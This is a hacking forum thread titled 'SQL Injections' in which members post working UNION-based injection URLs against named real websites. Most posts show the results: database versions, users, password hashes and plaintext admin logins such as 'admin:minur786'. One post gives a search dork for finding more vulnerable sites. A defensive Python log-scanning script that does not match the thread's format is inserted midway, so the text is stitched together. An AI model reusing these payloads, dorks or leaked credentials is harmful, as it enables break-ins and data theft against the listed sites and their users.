SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Tyc00n

    Tyc00n Elder

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Taking apart No. 2 :)
    Code:
    http://www.freefeasibilities.biz/links.php?link_id=-999+union+select+1,user(),version(),4,5,6/*
    Code:
    http://www.black-gold.de/games.php?game_id=-999+union+select+1,2,3,4,5,6,7/*
    Code:
    http://www.internet-allround.de/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.bobis24-shop.de/catalog/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9,10/*
    Code:
    http://www.bobolandia.com/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.accountablebanking.com/links.php?link_id=-999+union+select+1,2,3,4,concat(user,0x3a,password),6,7,8,9,10,11+from+mysql.user/*
    bh:3a0293a9050b30f9
     
    2 people like this.
  2. AFoST

    AFoST Elder

    Joined:
    28 May 2007
    Messages:
    602
    Likes Received:
    485
    Reputations:
    176
    Code:
    http://www.barriodelcarmen.net/evolucion/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
    Alex:2b132404fa9459ff3e6acec9737d3266

    Code:
    http://www.maynooth.org/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/**/limit/**/1,10/*
    Admin:5fec178cdc2f426f64764b87eaa5b9d7
     
  3. v1ru$

    v1ru$ Elder

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    Code:
    http://www.classicalsource.com/db_control/db_concert_review.php?id=-3392+union+select+concat(user_name,0x3a,password,0x3a,email),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user+limit+1,1/*
    
    Code:
    http://www.board.46info.ru/catlinks/info/?id=-3221+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()),20,21,22,23,24/*
    
     
    1 person likes this.
  4. gibson

    gibson Elder

    Joined:
    24 Feb 2006
    Messages:
    392
    Likes Received:
    247
    Reputations:
    88
    http://bitteam.ru/
    Code:
    http://bitteam.ru/?menu=22&id=-1'+union+select+null,user(),null,null,null,null,null,null,null,null/*
    user: 1gb_bitcms@81.176.226.10
    database: 1gb_bitcms
    mysql: 4.1.21-community-max-nt-log
     
    1 person likes this.
  5. -MoLoToK-

    -MoLoToK- Elder

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Code:
    http://www.webmasters.org/scripts/software-description.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,Table_Name,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables/*
    there is access to Information_schema.tables
    one of the interesting tables is sbwmd_admin
    hope it's not a repost, I can't check right now
     
    #3745 -MoLoToK-, 20 Nov 2007
    Last edited: 20 Nov 2007
    1 person likes this.
  6. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,986
    Likes Received:
    871
    Reputations:
    198
    www.teleset-ufa.ru
    root:5aff30257b10b358
    file_priv - Y
     
    1 person likes this.
  7. ЛифчиС5СВ

    ЛифчиС5СВ Elder

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Decided to go after Italy in response to the topic in News claiming that Russian sites are the worst and Italian ones are the best =)

    www.sodalitas.it
    Code:
    _http://www.sodalitas.it/news.php?ID=9+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+user
    Group and Order didn't help. =(
    Thought I'd wear myself out guessing the column count, but it all ended at the 46th. Phew =)

    The table we need: user
    The user we need: admin
    Columns in user: user, password
     
    1 person likes this.
  8. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Exploring Romania

    ziuaiasi.ro
    Code:
    http://www.ziuaiasi.ro/articol.html?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*
    5.0.27-log:ziua:ziua@localhost

    81 tables:
    Code:
    http://www.ziuaiasi.ro/articol.html?id=-1+union+select+1,2,3,4,5,6,table_name,8,9+from+information_schema.tables+limit+80,1/*
    Fields of the users table:
    Code:
    id, userId, nume, parola, mail, varsta, oras, studii, newsletter, data, activ
    Fields of the phpbb_users table:
    Code:
    user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
    Forum admin (login:md5[password]):
    Code:
    webmaster:e0afac77ae41af23c696457742954ac5
    electronica-azi.ro
    Code:
    http://www.electronica-azi.ro/articol.php?id_ar=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18/*
    4.0.27-log:electronicaazi:electronicaazi@localhost
     
    1 person likes this.
  9. Twiddle

    Twiddle Elder

    Joined:
    6 Sep 2006
    Messages:
    14
    Likes Received:
    7
    Reputations:
    0
    Code:
    Password ;) :web55ter
     
    1 person likes this.
  10. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Romania

    old.jurnalul.ro
    Code:
    http://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    5.0.24a-log:jurnalul:jurnalul@avjnet-web

    45 tables:
    Code:
    http://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+44,1/*
    Our table - admin:
    Code:
    id,username,parola,pages,data,status
    username : parola
    Code:
    zass:floaredelotus
    cristi:dinamo
    lucian:lucian
     
    1 person likes this.
  11. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Romania

    fundatia-sundari.ro
    Code:
    http://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
    5.0.45-community-log:fundatia_sundaridefault:fundatia_Robert@localhost

    43 tables:
    Code:
    http://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+42,1/*
    There's a Users table:
    Code:
    UserID,Nume,Parola,Email,Level,
    FirstName,LastName,Newsletter,Activated,
    LastLogin,LastIP,ConfirmationCode,SundariEMail,
    SundariEMailActivated,LastTime,MSN,Y,AIM,
    ICQ,Oras,DataNasterii,SiteWeb,Ocupatia,
    Interese,Personal,Imagine
    - hacked -
     
  12. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.videodive.ru/imgnews/news.php?id=-163+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*

    4.0.26-log/u9053@10.10.223.211/u9053
     
  13. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://ron.the-underdogs.info/game.php?id=-135+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2F,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
    Data: 4.0.27/ron@localhost/ron
    Users, but only hashes 8(

     
    1 person likes this.
  14. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.krepsinis.net/news.php?news_id=-66514+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,concat_ws(char(58,58),FIRST_NAME,password),14,15,16,17,18,19,20+from+users+limit+2,2/*
    Data: 5.0.22-log/sportotiltas1@192.168.69.21/krepsinis

    Admins and users

     
  15. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.flushy.com/games.php?id=-324+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/*
    4.0.27-max-log/flushy@64.202.163.220/flushy
     
    1 person likes this.
  16. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Romania

    traditii.ro
    Code:
    http://www.traditii.ro/articol.php?nr_articol=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    4.1.22-standard-log:traditii_traditii:traditii_cata@localhost

    parerea.com
    Code:
    http://parerea.com/articol.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*
    4.1.22-standard : parereac_wrdp1 : parereac@localhost

    agir.ro
    Code:
    http://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/*
    5.0.45-community-log:agirro_ziar:agirro_agir@localhost

    76 tables:
    Code:
    http://www.agir.ro/articol.php?id_articol=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+75,1/*
    Our table - agir_users:
    Code:
    id,username,password,email,title,realname,url,icq,msn,aim,yahoo,
    location,use_avatar,signature,disp_topics,disp_posts,email_setting,
    save_pass,notify_with_post,smilies,show_img,show_avatars,show_sig,
    link_to_new_win,timezone,style,num_posts,status,last_post,registered,
    last_visit,last_action,admin_note,activate_string
    Dumping the data:
    Code:
    http://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10+from+agirro_forum.agir_users+limit+109,1/*
     
    2 people like this.
  17. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Romania - no offense!

    visione.ro
    Code:
    http://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11/*
    5.1.20-beta-log:visione:visione@localhost

    87 tables:
    Code:
    http://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+86,1/*
    Our tables are forum_users and users

    Data from users (user:pass:email:status):
    Code:
    The admin panel is at _http://www.visione.ro/admin/,
    the credentials for it are above :D
     
    1 person likes this.
  18. -=lebed=-

    -=lebed=- hash cracker

    Joined:
    21 Jun 2006
    Messages:
    3,857
    Likes Received:
    1,962
    Reputations:
    594
    SQL injection in HotScripts Clone Script
    Code:
    http://site/software-description.php?id=[SQL-inj]
    
    Dork: inurl:"software-description.php?"
    Example: www.filelook.com
    Check the MySQL version, the current user and the database name:
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/
    5.0.45-community:filelook_fileloo@localhost:filelook_filelook
    Lucky: the MySQL version is >= 5, so there's no need to guess table names, there is the information_schema table: we read table names by changing the limit:
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1/*
    
    Tables:
    CHARACTER_SETS (0)
    COLLATIONS (1)
    COLLATION_CHARACTER_SET_APPLICABILITY (2)
    COLUMNS (3)
    COLUMN_PRIVILEGES (4)
    KEY_COLUMN_USAGE (5)
    PROFILING (6)
    ROUTINES (7)
    SCHEMATA (8)
    SCHEMA_PRIVILEGES (9)
    STATISTICS (10)
    TABLES (11)
    TABLE_CONSTRAINTS (12)
    TABLE_PRIVILEGES (13)
    TRIGGERS (14)
    USER_PRIVILEGES (15) -
    VIEWS (16)
    csv_feed (17)
    data (18)
    filelook_author_submission (19)
    filelook_awards (20)
    filelook_errreport (21)
    phpcountersmart_besucher (22)
    phpcountersmart_browser (23)
    phpcountersmart_color (24)
    phpcountersmart_ip (25)
    phpcountersmart_os (26)
    phpcountersmart_provider (27)
    phpcountersmart_referer (28)
    phpcountersmart_screen (29)
    sbwmd_admin (30) - interesting table ;-) fields: id, admin_name, pwd
    sbwmd_ads (31)
    sbwmd_banners (32)
    sbwmd_categories (33)
    sbwmd_config (34) - interesting table ;-)

    35 tables in total.
    Read the admin login, password and id:
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin/*
    
    admin:minur786:1
    Find the admin panel:
    Code:
    _http://www.filelook.com/siteadmin 
    Unfortunately... no luck! (the login and password don't work for the admin panel, or remote connections are forbidden?).

    How to see the other admins?
    Why don't queries with limit and where go through?
    Code:
    _http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+1,1/*
    _http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*
    Another example: brigaderu.ru
    Code:
    http://brigaderu.ru/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/*
    
    4.1.22:brigader@fe20.hc.ru:wwwbrigaderuru
    Admin:
    Code:
    _http://brigaderu.ru/software-description.php?id=-1+UNION+SELECT+concat(admin_name,char(58),pwd,char(58),id)+FROM+sbwmd_admin/*
    siteadm:brg48Zm:1
    Everything else is like the previous example: the admin panel won't let me in, no privileges to read files, IMHO, and limit/where don't work. What's the catch?
     
    3 people like this.
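The requests in this thread all share one shape: a negative id that returns no real row, a UNION SELECT that fills the page with attacker-chosen columns, information_schema or mysql.user as the source, and a trailing /* that cuts off the rest of the original query. The following detector, added here as an example and not code from the thread or any of the sites mentioned, normalises the obfuscations seen above ('+' and %20 for spaces, '/**/' in place of spaces) and flags such requests in constructed Common Log Format lines; the log lines and the signature names are my own assumptions.

```python
import re
from typing import List, Optional
from urllib.parse import unquote_plus

# Constructed access-log lines (Common Log Format); the request paths imitate
# the UNION-based enumeration style discussed in the thread, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Nov/2007:10:01:02 +0300] "GET /links.php?link_id=42 HTTP/1.1" 200 5120
10.0.0.7 - - [20/Nov/2007:10:01:09 +0300] "GET /links.php?link_id=-999+union+select+1,user(),version(),4,5,6/* HTTP/1.1" 200 4711
10.0.0.9 - - [20/Nov/2007:10:02:15 +0300] "GET /index.php?mapId=-1/**/union/**/select/**/0,username,password/**/from/**/jos_users/* HTTP/1.1" 200 3900
10.0.0.3 - - [20/Nov/2007:10:03:30 +0300] "GET /articol.php?id=-1%20union%20select%201,table_name%20from%20information_schema.tables%20limit%2080,1/* HTTP/1.1" 200 3100
10.0.0.4 - - [20/Nov/2007:10:04:00 +0300] "GET /software-description.php?id=17 HTTP/1.1" 200 6000
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)

# Signatures of the pattern seen in the thread: the UNION/SELECT pair, the
# metadata tables used for enumeration, string-building functions, and a
# negative id followed by the comment that neutralises the rest of the query.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "mysql_user": re.compile(r"\bmysql\.user\b", re.I),
    "concat": re.compile(r"\bconcat(_ws)?\s*\(", re.I),
    "negative_id_and_comment": re.compile(r"=-\d+.*/\*\s*$"),
}


def normalise(query: str) -> str:
    """URL-decode and collapse the space substitutes: '+', '%20' and the
    '/**/' inline comments that some of the requests above use."""
    decoded = unquote_plus(query)
    decoded = re.sub(r"/\*\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it looks benign."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = normalise(m.group("path").partition("?")[2])
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": m.group("path"), "hits": hits}


def scan_log(text: str) -> List[dict]:
    """Scan a whole log body and keep only the flagged requests."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], ",".join(finding["hits"]), finding["path"])
```

A 200 status on a flagged request is the interesting case: the page rendered, so the injected UNION row most likely landed in the output.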
  19. big_BRAT

    big_BRAT Elder

    Joined:
    23 Dec 2006
    Messages:
    78
    Likes Received:
    64
    Reputations:
    7
    I don't think there's any catch, there just aren't any more admins
    1. _http://www.filelook.com/software-description.php?id=-1+union+select+count(admin_name)+from+sbwmd_admin/*
    count returns 1

    limit and order also work
    http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+0,1/*
    , same story with "+where+id=1/*"
     
    1 person likes this.
  20. Tyc00n

    Tyc00n Elder

    Joined:
    13 Jan 2007
    Messages:
    30
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.1adruck.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.patronen-markt.de/catalog/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.hiddenstreamfarm.com/catalog-hsf/links.php?link_id=-999+union+select+1,2,user(),4,5,6,7,8,9/*
    Code:
    http://www.fitnesstienda.com/links.php?link_id=-999+union+select+1,2,3,4,5,6,7,8,9/*
    Code:
    http://www.ocioportal.net/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
    Code:
    http://www.bibeloty.com.pl/links.php?link_id=-999+union+select+1,2,user(),version(),5,6,7,8,9/*
     
    1 person likes this.